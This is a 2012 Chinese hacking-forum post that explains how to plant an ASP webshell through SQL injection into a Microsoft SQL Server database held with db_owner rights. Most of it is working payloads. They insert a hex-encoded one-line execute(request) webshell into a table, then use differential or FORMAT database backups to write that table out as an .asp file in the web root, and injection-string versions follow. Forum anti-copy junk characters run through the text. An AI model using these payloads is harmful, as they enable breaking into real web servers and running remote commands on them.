找回密码
 立即注册
查看: 3054|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:- h4 ~+ c4 X- `7 u$ d- ^
7 z0 W5 q/ b& c9 F" g
减少备份文件大小,得到可执行的webshell成功率提高不少
$ g5 l7 r; \# Q! [3 }一利用差异备份" J( a+ D+ v$ [3 s' j0 e- f5 d
加一个参数WITH DIFFERENTIAL
8 ]) V* }* ~1 p: d; L3 d- \+ M/ n& q/ f7 W
1
5 K% F$ ?/ c; \! K6 w2! F" g3 I, J0 K$ P
36 `* u" h/ R% h& ]/ G
4
) u4 ^# H5 J# H# H7 m declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
' Z0 H) b* w. o8 ncreate table [dbo].[xiaolu] ([cmd] [image]);' f3 `8 c) r# G% }
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E), R4 r4 @# U" i( E. V0 |
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL - b9 ~9 ~$ }6 E) ?2 g! }* y' r

; @* {: q4 F- S7 W1 k0 @二利用完全FORMAT! G: K7 W& i8 q3 g, ]
加一个参数WITH FROMAT
+ l4 q1 ?2 S$ T% t有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
! |0 l: B- M0 E
: m) M. x' \* r% ~1; ~. w7 j2 I6 p, k$ P' T
2
2 u$ q, y6 V6 |2 H  n0 z1 A3 d3
9 J2 g. H" b5 C0 ]9 g3 f/ L/ W1 o4
( p: n8 q' L7 T- q! J declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
7 F. T2 V7 T: ?+ `# ucreate table [dbo].[xiaolu] ([cmd] [image]);% I; p+ N8 O* E& ]8 ?0 V
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)4 o# k& L1 j/ V; \
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
1 y6 d) a# Z! w
3 u! ?* E7 R0 v. s; W/ t7 [总的来说就是那么简单几句,下面以备份数据库model为例子! f. @- t3 y7 B0 ^* h* z0 ]  F
1' V" i# |* e0 A+ U$ ~
* D) C6 v  u* O& p
1
9 v0 X) `, i. H id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') - r0 W$ L7 Z& h( o* }

" R8 P; X! A2 H, p3 q: z* Z" l! A2: _2 u6 I5 o. ?$ S! A7 ^. c- M; w
6 S" ?( b. K$ v! g# S7 J
1
! x! I! [3 |8 i9 [# c2 L5 D id=1;backup database model to disk='你的路径‘ with differential,format;-- # D5 `7 H, ?' I* g5 I+ E2 W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表